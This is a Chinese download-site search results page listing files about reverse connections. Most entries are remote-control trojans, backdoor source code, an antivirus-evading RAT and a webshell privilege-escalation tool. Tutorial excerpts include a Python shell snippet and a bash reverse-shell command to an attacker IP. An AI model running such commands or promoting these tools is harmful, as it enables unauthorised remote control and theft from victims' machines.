您好,欢迎光临本网站![请登录][注册会员]  

搜索资源列表

  1. PcShare 2.0反弹式HTTP隧道远程控制软件

  2. 本远程控制软件为客户连接的反弹方式,由客户主动连接服务器,通信方式 为HTTP隧道,可以控制局域网内部的机器。 控制功能包括屏幕控制,文件操作,注册表编辑,窗口管理,进程管理、服务管 理、按键记录、文件查找等大部分功能远程控制功能。 文件传输支持多文件下载,并能断点续传。 详细情况请见软件的帮助。 本软件属于远程控制类软件,请勿用于非法用途,否则一切后果自负。
  3. 所属分类:网络攻防

    • 发布日期:2009-05-12
    • 文件大小:1048576
    • 提供者:nxs128888
  1. 反弹连接后门反弹连接后门

  2. 反弹连接后门反弹连接后门反弹连接后门反弹连接后门
  3. 所属分类:Java

    • 发布日期:2009-06-25
    • 文件大小:51200
    • 提供者:yincheng01
  1. 狙剑V2008-0224

  2. “狙剑”是国内最近推出的一款功能强大的安全反黑工具,它提供系统监视、进程管理、磁盘文件管理、注册表检查、内核检查等功能。并且程序自带了很多系统监视功能,可以防止恶意软件对文件及注册表的修改,从而方便地手工查杀木马,是目前少数能与IceSword(冰刃)抗衡的反黑工具之一。   精简模式操作   当运行“狙剑”后,程序会自动缩小到系统栏中,双击图标可以展开软件的精简模式。精简模式包括进程管理、自启动程序管理等一些主要的安全功能。对不熟悉系统内部操作的用户来说,只需单击相应的功能按钮就可以完成所需
  3. 所属分类:网络攻防

    • 发布日期:2009-08-20
    • 文件大小:831488
    • 提供者:dongbao12006
  1. SvrDemo(写服务项演示程序)

  2. 运行后自删除,写注册表Run下,同时自拷贝到系统目录下,注册为系统服务SvrDemo,修改文件时间同Cmd.exe,每隔俩秒钟连接一次本地(127.0.0.1)的600端口,ip地址和端口可自行修改,部分代码来源于网上修改,主要在于演示服务程序
  3. 所属分类:Delphi

    • 发布日期:2009-12-21
    • 文件大小:3072
    • 提供者:keeley20
  1. c感染型木马范例 病毒入门必看

  2. U盘感染 磁盘感染 反弹连接木马 autorun病毒 下载者 还有可执行文件的释放等等例子,是病毒基本技术的集合
  3. 所属分类:其它

    • 发布日期:2011-06-03
    • 文件大小:153600
    • 提供者:unshell
  1. 反弹连接木马源码.源代码

  2. 反弹连接木马源码.源代码 反弹连接木马源码.源代码 反弹连接木马源码.源代码
  3. 所属分类:C#

    • 发布日期:2011-06-08
    • 文件大小:333824
    • 提供者:jackwzj
  1. 反弹木马 <img src="/images/sunny.gif" align="absmiddle">

  2. 远程反弹木马软件主要功能: 1、远程文件访问。包括文件上传、下载、文件。(夹)更名、文件删除、文件运行、文件查找、远程创建文件夹、远程清空文件夹等。  2、远程关机、启动、注销、修改组织名、用户名。  3、远程键盘记录、鼠标控制、锁定键盘鼠标、模拟特别键功能。  4、远程注册表模拟器、快速注册表修改。  5、远程消息发送、远程进程控制。  6、远程查看剪贴板、当前活动窗体名、隐藏桌面图标、隐藏任务栏、隐藏开始按钮等。  7、远程系统命令、远程DOS命令。  8、远程屏幕抓图(可保存为图片)。 
  3. 所属分类:网络攻防

    • 发布日期:2006-02-23
    • 文件大小:900096
    • 提供者:chenxh
  1. 大白鲨远程控制2010版

  2. 大白鲨 远控的2010正式版 特征码很少 进行少量的修改就可以实现免杀 支持反弹连接技术
  3. 所属分类:网络攻防

    • 发布日期:2011-11-13
    • 文件大小:1048576
    • 提供者:hazcwwq
  1. vc++端口转发程序源代码

  2. 修改的一个端口转发程序源代码,三种模式,多线程支持多连接,支持重连,有保活机制,与socks5服务器配合,可构成访问内网的socks5服务器。
  3. 所属分类:C++

    • 发布日期:2008-06-22
    • 文件大小:13312
    • 提供者:cuilonggang
  1. 基于HTTP隧道的个人防火墙穿透技术研究

  2. 基于HTTP隧道的个人防火墙穿透技术研究,硕士论文,较为全面的介绍了防火墙扫描和穿透技术,设计和实现了基于反弹连接+HTTP隧道的防火墙穿透技术。注意下载CAJView打开。
  3. 所属分类:其它

    • 发布日期:2012-05-06
    • 文件大小:1048576
    • 提供者:firefoxyw
  1. JAVA实验报告

  2. JAVA 实验报告,分别是 Java语言基础、实现线性表、学生管理系统、Java连接数据库、反弹小球。含JAVA具体代码,实验步骤,实验心得体会。
  3. 所属分类:Java

    • 发布日期:2012-05-18
    • 文件大小:1031168
    • 提供者:kakazhouqi1
  1. VB 反弹连接cs网络

  2. 网络 反弹 连接 VB 源码 研究 代码 资源 技术
  3. 所属分类:网络监控

    • 发布日期:2012-09-05
    • 文件大小:21504
    • 提供者:soldir001
  1. Access溢出提权工具

  2. Access溢出提权工具,获取WEBSHELL后不需要CMD,只要操作数据库打开即可反弹连接获取CMDSHELL非常实用
  3. 所属分类:网络攻防

    • 发布日期:2012-10-18
    • 文件大小:13312
    • 提供者:vcshellcode
  1. C++黑客编程

  2. 第一篇 基础篇. 第1章 开发网络安全程序基础 2 1.1 认识windows api和socket 2 1.1.1 windows api编程的优点 2 1.1.2 socket通信流程 3 1.2 服务器端socket编程 4 1.2.1 使用socket前的准备工作 4 1.2.2 建立socket 4 1.2.3 绑定端口 5 1.2.4 监听端口 6 1.2.5 创建服务器端接受客户端请求 6 1.2.6 服务器端响应客户端连接请求 7 1.2.7 完成服务端与客户端socket连接
  3. 所属分类:其它

    • 发布日期:2014-05-19
    • 文件大小:56623104
    • 提供者:u010493254
  1. 009绝密文件加密工具软件

  2. 本软件的作用:加密指定文件夹下的重要文件(如文档、源码、图像等),加密后,即便硬盘或U盘被盗去,文件的内容也不会泄密。解密后文件还原,即可正常操作文件,只加密一次后,以后的加密均为一键完成,操作便捷。 本软件采用密码分段输入的方式,使用了多层算法加密(类似RSA,RC6,AES这样的国际知名标准加密算法,用了3种以上,作者的私人不公开加密算法,用了3种以上,即对每文件的加密总共是6层,等于一自行车上有六把不同厂家的锁)软件界面差但注重实用,尤其注重安全强度,并有反暴破,反篡改,反窥视,反钓鱼,
  3. 所属分类:系统安全

    • 发布日期:2015-04-07
    • 文件大小:856064
    • 提供者:lswtzw
  1. 009绝密文件加密工具_V1.62

  2. 本软件的作用:加密指定文件夹下的重要文件(如文档、源码、图像等),加密后,即便硬盘或U盘被盗去,文件的内容也不会泄密。解密后文件还原,即可正常操作文件,只加密一次后,以后的加密均为一键完成,操作便捷。 本软件采用密码分段输入的方式,使用了多层算法加密(类似RSA,RC6,AES这样的国际知名标准加密算法,用了3种以上,作者的私人不公开加密算法,用了3种以上,即对每文件的加密总共是6层,等于一自行车上有六把不同厂家的锁)软件界面差但注重实用,尤其注重安全强度,并有反暴破,反篡改,反窥视,反钓鱼,
  3. 所属分类:系统安全

    • 发布日期:2015-04-14
    • 文件大小:1048576
    • 提供者:lswtzw
  1. vb 中WINSOK 反弹连接

  2. 这个是WINSOK的反弹连接代码 适合学入门者
  3. 所属分类:VB

    • 发布日期:2009-03-17
    • 文件大小:21504
    • 提供者:soarfly2005
  1. python模拟菜刀反弹shell绕过限制【推荐】

  2. 有的时候我们在获取到目标电脑时候如果对方电脑又python 编译环境时可以利用python 反弹shell 主要用到python os库和sokect库 这里的服务端在目标机上运行 from socket import * from os import * s=socket(AF_INET,SOCK_STREAM)#IVP4 寻址 tcp协议 s.bind(('',6666))#补丁端口 s.listen(1)#开始监听一个队列 while True: sock,addr=s.accept
  3. 所属分类:其它

    • 发布日期:2020-12-31
    • 文件大小:40960
    • 提供者:weixin_38659648
  1. 浅析Linux之bash反弹shell原理

  2. 环境 攻击机:kali            ip:192.168.25.144 靶    机:centos      ip:192.168.25.142 过程 kali 监听本地8888端口 靶机 centos 写入 反弹shell 的命令 bash -i >& /dev/tcp/192.168.25.144/8888 0>&1 攻击机 kali 成功反弹shell 原理 反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是局域网,或者
  3. 所属分类:其它

    • 发布日期:2021-01-08
    • 文件大小:379904
    • 提供者:weixin_38631729
  1. 浅析Linux之bash反弹shell原理

  2. 环境 攻击机:kali            ip:192.168.25.144 靶    机:centos      ip:192.168.25.142 过程 kali 监听本地8888端口 靶机 centos 写入 反弹shell 的命令 bash -i >& /dev/tcp/192.168.25.144/8888 0>&1 攻击机 kali 成功反弹shell 原理 反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是局域网,或者
  3. 所属分类:其它

    • 发布日期:2021-01-08
    • 文件大小:379904
    • 提供者:weixin_38635975
« 12 3 »